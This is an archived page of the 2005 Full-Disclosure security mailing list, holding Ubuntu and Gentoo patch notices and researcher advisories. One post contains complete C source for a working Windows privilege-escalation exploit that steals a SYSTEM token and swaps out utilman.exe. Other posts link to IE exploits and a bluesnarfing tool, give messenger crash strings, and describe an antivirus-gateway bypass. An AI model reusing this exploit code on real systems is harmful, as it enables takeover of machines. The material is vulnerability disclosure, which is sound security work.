      Size/MD5: 113756 2e6293b7d8788ca1e6584eeb371d4746
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-rsh-server_1.3.4-3ubuntu0.1_i386.deb
      Size/MD5: 73758 d2b3b94e05e43169379c0d6a742d15e2
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-telnetd_1.3.4-3ubuntu0.1_i386.deb
      Size/MD5: 55284 8d279d10b1238c64e8e788e163d10697
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-user_1.3.4-3ubuntu0.1_i386.deb
      Size/MD5: 125264 0e37aeb9bf575e214e526148f6021abd
    http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkadm55_1.3.4-3ubuntu0.1_i386.deb
      Size/MD5: 160580 b735959ba91dad37fd12dd89faf798de
    http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb5-dev_1.3.4-3ubuntu0.1_i386.deb
      Size/MD5: 559754 cccfdccc55db99dce5d79583060ec1a7
    http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb53_1.3.4-3ubuntu0.1_i386.deb
      Size/MD5: 339586 9c4e8bb211b3b463d2293a7e5acebac9

powerpc architecture (Apple Macintosh G3/G4/G5)

    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-admin-server_1.3.4-3ubuntu0.1_powerpc.deb
      Size/MD5: 103998 72a3841148e8736286547e3b34b0d42d
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-clients_1.3.4-3ubuntu0.1_powerpc.deb
      Size/MD5: 214930 137626b6516e100a313612b79f28a2f4
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-ftpd_1.3.4-3ubuntu0.1_powerpc.deb
      Size/MD5: 55814 592491f4a84ce02651ec9489d2f64c4e
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-kdc_1.3.4-3ubuntu0.1_powerpc.deb
      Size/MD5: 124368 d68fe5a0c785baa01d2d7e7b6f14477f
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-rsh-server_1.3.4-3ubuntu0.1_powerpc.deb
      Size/MD5: 81392 2c43228e3b6d42fcdd214a516e9a4329
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-telnetd_1.3.4-3ubuntu0.1_powerpc.deb
      Size/MD5: 60498 d2604219b83e84bea7ee2460a626fb59
    http://security.ubuntu.com/ubuntu/pool/universe/k/krb5/krb5-user_1.3.4-3ubuntu0.1_powerpc.deb
      Size/MD5: 141916 fa44026deba1951732f3748381d0f842
    http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkadm55_1.3.4-3ubuntu0.1_powerpc.deb
      Size/MD5: 164366 b71f6b535f950994b907f39e8685ee57
    http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb5-dev_1.3.4-3ubuntu0.1_powerpc.deb
      Size/MD5: 633862 bc094b01dfd0b507e157c870b6fa94a8
    http://security.ubuntu.com/ubuntu/pool/main/k/krb5/libkrb53_1.3.4-3ubuntu0.1_powerpc.deb
      Size/MD5: 351532 6fdb209e66b2935696a43f60efad7934

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFB4odSDecnbV4Fd/IRAhL+AJ99kGySsJAOqzpbIAeArJiG0wk+XgCgumxs
6sTQxkVifdgckmy9N+5LR8Y=
=N/aG
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] bluetooth bluesnarfing tool

From: Davide Del Vecchio (dantealighieri.org)
Date: Mon Jan 10 2005 - 08:28:26 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello,

sometimes ago, me and Roberto "boos" Martelloni, developed
a Linux pof to bluesnarf (read/write/search/perform arbitrary command..).

The tool was attached to an article (just Italian) published on
the e-zine BFi.

The compressed archive (article+tool) could be downloaded at the url:

http://www.alighieri.org/projects/bluetooth.tar.gz

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Davide Del Vecchio "Dante Alighieri" dantealighieri.org danteolografix.org
http://www.alighieri.org http://www.ezln.it
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Encrypted Messenger DoS Vulnerability

From: Adam Baldwin (evilpacketgmail.com)
Date: Mon Jan 10 2005 - 10:36:29 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

Title: Encrypted Messenger Remote DoS Vulnerability
Vendor Homepage: http://www.johnytech.com

Discovered by: Adam Baldwin (evilpacketngenuity-is.com)
www.evilpacket.net\advisories\EP-000-0001.html

Discovery Date: 1.6.2005

Criticality: Low

Vulnerable Version:Encrypted Messenger 3.0.71 (and possibly earlier versions)

Overview:
Encrypted Messenger (Author: John Hasson) is an add-on program to many
instant messenger (IM) applications. It provides end-to-end encryption for
many insecure im applications. It is possible to crash the remote (and local)
encrypted messenger client using a simple string of characters. Although this
is low criticality, a properly timed message could crash the encrypted
messenger client causing a message being sent to go out insecurly.

Steps for Reproduction:
Simple send one of the following strings anywhere inside of your
IM to cause the remote encrypted messenger client to throw a
run-time exception. Which may be run-time exception (5, 13 or 91)
Note, there is no requirement for encryption to be enabled on the
remote client nor is there any requirement for the attacker to have
encrypted messenger installed.

        Lethal Strings:
        %~%
        !~!

Mitigation:
The author has confirmed that the next release of Encrypted Messenger will
contain a fix for this vulnerability.. As always do not add or authorize unknown
users to your IM client.

At this time it is not known if further exploitation is possible.

Thanks to Craig Lewis, who helped with extended testing.

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Google Hacking and SiteDigger 2.0

From: Kartik Trivedi (javapro13mac.com)
Date: Mon Jan 10 2005 - 10:43:06 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Foundstone releases Sitedigger 2.0. Popular free tool to harvest security exposures using google. Download from http://www.foundstone.com

New features include

Increased signatures - ~1000 (Foundstone + johnny.ihackstuff.com signatures). Latest signature exposes webcams :)
Automatic updates, Improved search, Enhanced reports and submit signatrues - get credits

http://www.infoworld.com/article/05/01/10/02NNmcafee_1.html
http://biz.yahoo.com/prnews/050110/sfm075_1.html

Cheers
Kartik
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] AV security contacts

From: Darren Bounds (dboundsintrusense.com)
Date: Mon Jan 10 2005 - 10:42:38 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

I'm looking for security contact information for the following vendors:

   - Sophos
   - Trend
   - McAfee
   - Norman
   - Norton

Any assistance would be greatly appreciated.

Thank you,

Darren Bounds
Intrusense, LLc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFB4rCIsvxTSz2eaa8RAhMkAKDJt+Rxb4oNiG58TQxMTD8YyydpxgCfeBkO
KBq2CqrvZSLW0e/rmpFUUIc=
=wra9
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] applicable exploit for winxp-sp2-uptodate Internet Explorer

From: Liu Die Yu (liudieyuumbrella.name)
Date: Tue Jan 11 2005 - 00:46:09 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

patch will come in hours(at least i believe so).

many people(paul of greyhats and mike, sandblad of secunia and
shreddersub7) already provided proof-of-concept remote-code-execution
exploit for winxp-sp2-uptodate Internet Explorer.

the problem is: their code is simply not applicable in real attack. so i
made this:
http://0daymon.org/monitor/injecthh-op-2/dir/injecthh_op_2-code_by_liudieyu
http://0daymon.org/monitor/injecthh-op-2/dir.zip

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] UPDATED: the insider exploit( = the latest ie 0day which involves SHOWMODALDIALOG)

From: Liu Die Yu (liudieyuumbrella.name)
Date: Tue Jan 11 2005 - 01:06:14 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

the insider exploit( = the latest ie 0day involving SHOWMODALDIALOG) was
verified to work on winxp-en-pro-sp1-ms04004(MS04-004 = Q832894 =
KB832894), but it does not work on winxp-en-pro-sp1-noextrapatch.

jelmer's exploit is not perfect: URLs are hardcoded, and JSP is not
popular. so i made this PHP version for copy-and-play:
http://0daymon.org/monitor/insider/dir.zip

=====
i got it while preparing my collection of applicable IE 0day and related
original posts:
http://0daymon.org/monitor/
that exploit doesn't work without that IE patch - quite weired, right?

and those phishers and their tech support are not as wise as the media
describes:
1. they should have removed their code immediately after
THE-INSIDER(RAFI from IS) published those URLs. but they still run
their stuff to tell the whole world: "yes! we are criminals armed with
0day!"
2. at that time most of home-user systems( = their targets) were not
uptodate, which means most of them didn't have MS04-004 required for the
exploit to successfully compromise themself.

first i test, then i post :-)))

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [USN-59-1] mailman vulnerabilities

From: Martin Pitt (martin.pittcanonical.com)
Date: Mon Jan 10 2005 - 13:03:54 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

===========================================================
Ubuntu Security Notice USN-59-1 January 10, 2005
mailman vulnerabilities
CAN-2004-1177, http://bugs.debian.org/285839
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

mailman

The problem can be corrected by upgrading the affected package to
version 2.1.5-1ubuntu2.2. In general, a standard system upgrade is
sufficient to effect the necessary changes.

Details follow:

Florian Weimer discovered a cross-site scripting vulnerability in
mailman's automatically generated error messages. An attacker could
craft an URL containing JavaScript (or other content embedded into
HTML) which triggered a mailman error page. When an unsuspecting user
followed this URL, the malicious content was copied unmodified to the
error page and executed in the context of this page.

Juha-Matti Tapio discovered an information disclosure in the private
rosters management. Everybody could check whether a specified email
address was subscribed to a private mailing list by looking at the
error message. This bug was Ubuntu/Debian specific.

Important note:

There is currently another known vulnerability: when an user
subscribes to a mailing list without choosing a password, mailman
automatically generates one. However, there are only about 5 million
different possible passwords which allows brute force attacks.

A different password generation algorithm already exists, but is
currently too immature to be put into a stable release security
update. Therefore it is advisable to always explicitly choose a
password for subscriptions, at least until this gets fixed in Warty
Warthog.

See https://bugzilla.ubuntu.com/4892 for details.

Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-1ubuntu2.1.diff.gz
      Size/MD5: 126741 01388ca6ce18ad7c6ffed0dd80331787
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-1ubuntu2.1.dsc
      Size/MD5: 658 a7fdf27bc0a54c7ce646c068ccbab069
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-1ubuntu2.2.diff.gz
      Size/MD5: 126788 0c685a329b175f2cd9bef8c86ddd3179
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-1ubuntu2.2.dsc
      Size/MD5: 658 f0251d2cb874e9b11d89e784b742ea8e
    http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5.orig.tar.gz
      Size/MD5: 5745912 f5f56f04747cd4aff67427e7a45631af

amd64 architecture (Athlon64, Opteron, EM64T Xeon)

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-1ubuntu2.2_amd64.deb
Size/MD5: 6602214 27b11a8db50589de58d10d3332dc8ddb

i386 architecture (x86 compatible Intel/AMD)

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-1ubuntu2.2_i386.deb
Size/MD5: 6601678 b7ddc324749fe4f4dae5f822c2d37ded

powerpc architecture (Apple Macintosh G3/G4/G5)

http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-1ubuntu2.2_powerpc.deb
Size/MD5: 6610730 ac37d779df320be8dfe6fb86f4c6293d

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFB4tGaDecnbV4Fd/IRAhI2AJ4qUNNyuPJxN6pDjybF54R6I6q2FACgoJ0H
pbZn0bpXxd077zs2KyCRjf4=
=j0WX
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability

From: Darren Bounds (dboundsintrusense.com)
Date: Mon Jan 10 2005 - 13:08:11 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Multi-vendor AV gateway image inspection bypass vulnerability
January 10, 2005

A vulnerability has been discovered which allows a remote attacker to
bypass anti-virus
(as well other security technologies such as IDS and IPS) inspection of
HTTP image content.

By leveraging techniques described in RFC 2397 for base64 encoding
image content within
the URL scheme. A remote attack may encode a malicious image within the
body of an HTML
formatted document to circumvent content inspection.

For example:

http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php

The source code at the URL above will by default create a JPEG image
that will attempt (and fail
without tweaking) to exploit the Microsoft MS04-028 GDI+ vulnerability.
The image itself is detected
by all AV gateway engines tested (Trend, Sophos and McAfee), however,
when the same image
is base64 encoded using the technique described in RFC 2397 (documented
below), inspection
is not performed and is delivered rendered by the client.

While Microsoft Internet Explorer does not support the RFC 2397 URL
scheme; Firefox, Safari,
Mozilla and Opera do and will render the data and thus successfully
execute the payload if the necessary
OS and/or application patches have not been applied.

## BEGIN HTML ##

## END HTML ##

Solution:

While AV vendor patches are not yet available, fixes for all currently
known image vulnerabilities are
and have been for several months. If you have not yet applied them,
you have your own
negligence to blame.

Contributions:

Thanks to Scott Roeder and Jacinto Rodriquez their assistance in
platform testing.

Thank you,

Darren Bounds
Intrusense, LLC.
http://www.intrusense.com

- --
Intrusense - Securing Business As Usual
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (Darwin)

iD8DBQFB4tKesvxTSz2eaa8RAluUAKDmUsM6Hf+U321P/kALTC/rKwoLOwCfaK57
XT6MWYJOH3FmLfV3B1UfuJA=
=82yy
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [AppSecInc Team SHATTER Security Advisory] Microsoft Windows Improper Token Validation

From: Team SHATTER (Application Security, Inc.) (vrathodappsecinc.com)
Date: Mon Jan 10 2005 - 16:12:17 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Microsoft Windows Improper Token Validation

AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/general/06-0001.html
January 10, 2005

Credit: This vulnerability was discovered and researched by Cesar
Cerrudo of Application Security, Inc.

Risk Level: High

Summary:
A local privilege elevation vulnerability exists on the Windows
operating systems. This vulnerability allows any user to take complete
control over the system and affects Windows 2000, Windows XP, and
Windows 2003 (all service packs).

Versions Affected:
Microsoft Windows 2000, Windows XP, and Windows 2003 (all service packs).

Details:
According to MSDN:

"An access token is an object that describes the security context of a
process or thread. The information in a token includes the identity and
privileges of the user account associated with the process or thread.
When a user logs on, the system verifies the user's password by
comparing it with information stored in a security database. If the
password is authenticated, the system produces an access token. Every
process executed on behalf of this user has a copy of this access token.

The system uses an access token to identify the user when a thread
interacts with a securable object or tries to perform a system task that
requires privileges. Access tokens contain the following information:

- The security identifier (SID) for the user's account
- SIDs for the groups of which the user is a member
- A logon SID that identifies the current logon session
- A list of the privileges held by either the user or the user's groups
- An owner SID
- The SID for the primary group
- The default DACL that the system uses when the user creates a
securable object without specifying a security descriptor
- The source of the access token
- Whether the token is a primary or impersonation token
- An optional list of restricting SIDs
- Current impersonation levels
- Other statistics

Every process has a primary token that describes the security context of
the user account associated with the process. By default, the system
uses the primary token when a thread of the process interacts with a
securable object. Moreover, a thread can impersonate a client account.
Impersonation allows the thread to interact with securable objects using
the client's security context. A thread that is impersonating a client
has both a primary token and an impersonation token."

Microsoft introduced a new user right called "Impersonate a client after
authentication" in Windows 2000 SP4, Windows 2003, and Windows XP SP2.
This right allows or limits the processes ran by a user from being able
to impersonate. For instance, if a process thread running in the
security context of a user without proper rights tries to impersonate,
then it gets an Identity Token instead of an Impersonation Token. An
Identity Token only identifies the user account under which the target
process is running and can not be used for impersonation. An Identity
Token can also be retrieved by a thread in order to identify the user
account under which a process is running. Under certain circumstances
this Identity Token can be used to impersonate any process thread
running under any user account.

The attack vector identified is to impersonate a victim using Identity
Tokens to access network shares using UNC. For instance, after a thread
gets an Identity Token for the Local System account or an administrative
account, the token can be used to impersonate and access administrative
shares such as \\computername\c$ and to replace system files such as
.exe, .dll, etc... This allows an attacker to elevate privileges or to
read arbitrary files bypassing permissions. Also, network shares on
other computers can be accessed in the same way. For instance, user
JohnDoe's Identity Token can access \\remotepc\someshare\ for which the
user JohnDoe has permissions but the attacker does not. The attack
succeeds because apparently that user's credentials are cached by the
LSASS (Local Security Authority Subsystem Service) after successfully
authenticating to a network share by standard methods. Then when the
share is accessed again, the LSASS assumes an Identity Token is an
Impersonation token and uses the cached credentials to authenticate.

This vulnerability is critical for servers using Terminal Services (or
Citrix) because a user could impersonate any other user to access
network shares.

Links:

http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/client_impersonation.asp
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/secauthz/security/access_tokens.asp
http://support.microsoft.com/kb/821546/en-us
http://www.microsoft.com/resources/documentation/WindowsServ/2003/standard/proddocs/en-us/Default.asp?url=/resources/documentation/WindowsServ/2003/standard/proddocs/en-us/647.asp

Workaround:
None.

Fix:
http://www.microsoft.com/technet/security/bulletin/MS04-044.mspx

----------------------------------------------------------------------
Application Security, Inc.
www.appsecinc.com

AppSecInc is the leading provider of database security solutions for
the enterprise. AppSecInc products proactively secure enterprise
applications at more than 200 organizations around the world by
discovering, assessing, and protecting the database against rapidly
changing security threats. By securing data at its source, we enable
organizations to more confidently extend their business with
customers, partners and suppliers. Our security experts, combined
with our strong support team, deliver up-to-date application
safeguards that minimize risk and eliminate its impact on business.
----------------------------------------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [AppSecInc Team SHATTER Security Advisory] Microsoft Windows LPC heap overflow

From: Team SHATTER (Application Security, Inc.) (vrathodappsecinc.com)
Date: Mon Jan 10 2005 - 16:12:24 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Microsoft Windows LPC heap overflow

AppSecInc Team SHATTER Security Advisory
http://www.appsecinc.com/resources/alerts/general/07-0001.html
January 10, 2005

Credit: This vulnerability was discovered and researched by Cesar
Cerrudo of Application Security, Inc.

Risk Level: High

Summary:
A local privilege elevation vulnerability exists on the Windows
operating systems. This vulnerability allows any user to take complete
control over the system and affects Windows NT, Windows 2000, Windows
XP, and Windows 2003 (all service packs).

Versions Affected:
Microsoft Windows NT, Windows 2000, Windows XP, and Windows 2003 (all
service packs).

Details:
The LPC (Local Procedure Call) mechanism is a type of interprocess
communication used by the Windows operating systems. LPC is used to
communicate between processes running on the same system while RPC
(Remote Procedure Call) is used to communicate between processes on
remote systems.

When a client process communicates with a server using LPC, the kernel
fails to check that the server process has allocated enough memory
before copying data sent by the client process. The native API used to
connect to the LPC port is NtConnectPort. A parameter of the
NtConnectPort API allows a buffer of up 260 bytes. When using this
function the buffer is copied by the kernel from the client process to
the server process memory ignoring the buffer size restriction which the
server process set when calling NtCreatePort (the native API used to
create LPC ports). This causes a heap corruption in the server process
allowing arbitrary memory to be overwritten and can lead to arbitrary
code execution.

Workaround:
None.

Fix:
http://www.microsoft.com/technet/security/bulletin/MS04-044.mspx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Windows Improper Token Validation -Exploit-

From: Cesar (cesarc56yahoo.com)
Date: Mon Jan 10 2005 - 16:52:45 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Enjoy!!!!!!;)

Cesar.

__________________________________
Do you Yahoo!?
Take Yahoo! Mail with you! Get it on your mobile phone.
http://mobile.yahoo.com/maildemo

// Impersonation POC Exploit
// Works on Win2k all service packs
// by Cesar Cerrudo (sqlsec>at<yahoo>dot<com)
// http://www.microsoft.com/technet/security/bulletin/MS04-044.mspx
// (*1*) If it doesn't work try again and research yourself. Don't ask me.

#include "stdafx.h"
#include "windows.h"
#include "stdio.h"

#define INFO_BUFFER_SIZE MAX_COMPUTERNAME_LENGTH + 1
#define PATH_SIZE INFO_BUFFER_SIZE + MAX_PATH + 4
typedef UINT (WINAPI* PFnMsiInstallProduct)(LPCSTR szPackagePath, LPCSTR szCommandLine);

int main(int argc, char* argv[])
{
        HANDLE hToken,hThread;
        HMODULE hMsi = 0;
        CHAR infoBuf[INFO_BUFFER_SIZE];
        DWORD bufCharCount = INFO_BUFFER_SIZE;
        CHAR file1[PATH_SIZE]="\\\\";
        CHAR file2[PATH_SIZE]="\\\\";
        CHAR file3[PATH_SIZE]="\\\\";

        //Get name of the computer.
        GetComputerName(infoBuf, &bufCharCount);

        hThread=GetCurrentThread();
        hMsi = LoadLibrary("msi.dll");

        //Invoke windows installer service in order to steal a Local System account identity token.
        //Curious? some internal LPC magic here, see *1*
        PFnMsiInstallProduct MsiInstallProduct = 0;
        MsiInstallProduct = (PFnMsiInstallProduct)GetProcAddress(hMsi, "MsiInstallProductA");
        MsiInstallProduct("","");

        //Get Local System account identity token and set it to current thread
        hToken=(void*)0x1;
        while(SetThreadToken(&hThread,hToken)==NULL){
                hToken=(void*)((int)hToken+1);
        }

        strcat(file1,infoBuf);
        strcat(file1,"\\C$\\winnt\\system32\\utilman.exe");

        strcat(file2,infoBuf);
        strcat(file2,"\\C$\\winnt\\system32\\utilmanback.exe");

        strcat(file3,infoBuf);
        strcat(file3,"\\C$\\winnt\\system32\\notepad.exe");

        //Replace Utility Manager with Notepad impersonating Local System account
        //BTW: fuck Windows file protection :)
        if(!CopyFile(file1,file2, TRUE))
                printf("CopyFile() failed: %d\n", GetLastError());
        else
                if(!CopyFile(file3,file1, FALSE))
                        printf("CopyFile() failed: %d\n", GetLastError());
                else {
                        printf("\nPress WinKey+U to run Notepad as Local System\n");
                        printf("Remember to restore original utilman.exe from utilmanback.exe\n");
                }

Sleep(5000);
return 0;
}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Firespoofing [Firefox 1.0]

From: mikx (mikxmikx.de)
Date: Mon Jan 10 2005 - 17:22:09 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

__Summary

Using javascript it is possible to spoof the content of security and
download dialogs by partly covering them with a popup window. This can fool
a user to download and automaticly execute a file (if a file extension
association exists) or to grant a script local data access (if codebase
principals are enabled).

__Expected Behavior

Modal dialogs should always be on top and it should not be possible to
obfuscate their appearance.

__Proof-of-Concept

http://www.mikx.de/firespoofing/

The PoC is designed for Firefox 1.0 running in a maximized window.

Part 1 - download dialog spoofing
Shows how to cover a download dialog and fool the user to execute a file
with a standard windows file association (in this case a .ht file). BTW,
remember the latest .ht buffer overflow...

Part 2 - security dialog spoofing
Shows how to cover a security dialog. Make sure codebase principals are
enabled (not default but encouraged by many XUL sites). Creates the file
c:\booom.txt to proof local system access.

__Status

The bug is confirmed but currently unfixed (open for more than 3 months). As
a partial workaround set dom.disable_window_flip to true in about:config.
The vendor failed to respond to multiple status requests which led to this
public disclosure.

2004-09-20 Vendor informed (bugzilla.mozilla.org #260560)
2004-09-20 Vendor confirmed bug
2004-10-20 Status request (open for 1 month - no reply)
2005-01-03 Status request (open for 3 months - no reply)
2005-01-07 Status request (disclosure warning - no reply)
2005-01-11 Public disclosure

__Affected Software

Tested with Firefox 1.0, Mozilla 1.7.5 and Netscape 7.1 on Windows XP SP2.

__Contact Informations

Michael Krax <mikxmikx.de>
http://www.mikx.de/?p=7

mikx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200501-15 ] UnRTF: Buffer overflow

From: Dan Margolis (krispykringlegentoo.org)
Date: Mon Jan 10 2005 - 18:07:12 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200501-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: UnRTF: Buffer overflow
      Date: January 10, 2005
      Bugs: #74480
        ID: 200501-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A buffer overflow in UnRTF allows an attacker to execute arbitrary code
by way of a specially crafted RTF file.

Background
==========

UnRTF is a utility to convert files in the Rich Text Format into other
formats.

Affected packages
=================

Description
===========

An unchecked strcat() in unrtf may overflow the bounds of a static
buffer.

Impact
======

Using a specially crafted file, possibly delivered by e-mail or over
the web, an attacker may execute arbitrary code with the permissions of
the user running UnRTF.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All unrtf users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/unrtf-0.19.3-r1"

References
==========

[ 1 ] Original Announcement
http://tigger.uic.edu/~jlongs2/holes/unrtf.txt

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-15.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
securitygentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iQEVAwUBQeMYsLDO2aFJ9pv2AQKgLQf+J+lXsBewJloT/RY3XOLEHmwhAPU5aPCz
Mla5MP0sTrqhwISHYAXyCxUcxfUamoF3cmknBi3UBid2UDssLF8a/dAqoPwWgHgx
1XCjyzDDgjzi0vbOZnT5atQ3+/ZyD0d+u68Y17Eh+hvLs772B+S30xbWiFomr/lF
iJFvuUM+eZRtHRk1N//XjPn1n9xPm8oMSEgVxiOp0FcciikyeEGvf73hh0ZS8YOn
XIrK44k93l73/WWY/N3PXQORQsxMPW0YLwWh5yjZ263QG6ZKhySRYUIohVENc/0c
7fPy6K1tKZVqNicowPBDa2ceaal7N+gsxVYxDOB0Off3qFiEC+k6GQ==
=ZcU/
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] [ GLSA 200501-14 ] mpg123: Buffer overflow

From: Dan Margolis (krispykringlegentoo.org)
Date: Mon Jan 10 2005 - 18:08:37 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Linux Security Advisory GLSA 200501-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: mpg123: Buffer overflow
      Date: January 10, 2005
      Bugs: #76862
        ID: 200501-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

An attacker may be able to execute arbitrary code by way of specially
crafted MP2 or MP3 files.

Background
==========

mpg123 is a real-time MPEG audio player.

Affected packages
=================

Description
===========

mpg123 improperly parses frame headers in input streams.

Impact
======

By inducing a user to play a malicious file, an attacker may be able to
exploit a buffer overflow to execute arbitrary code with the
permissions of the user running mpg123.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All mpg123 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-sound/mpg123-0.59s-r9"

References
==========

  [ 1 ] CAN-2004-0991
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0991
  [ 2 ] Bugtraq Announcement
        http://www.securityfocus.com/archive/1/374433

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200501-14.xml

Concerns?
=========

License
=======

The contents of this document are licensed under the
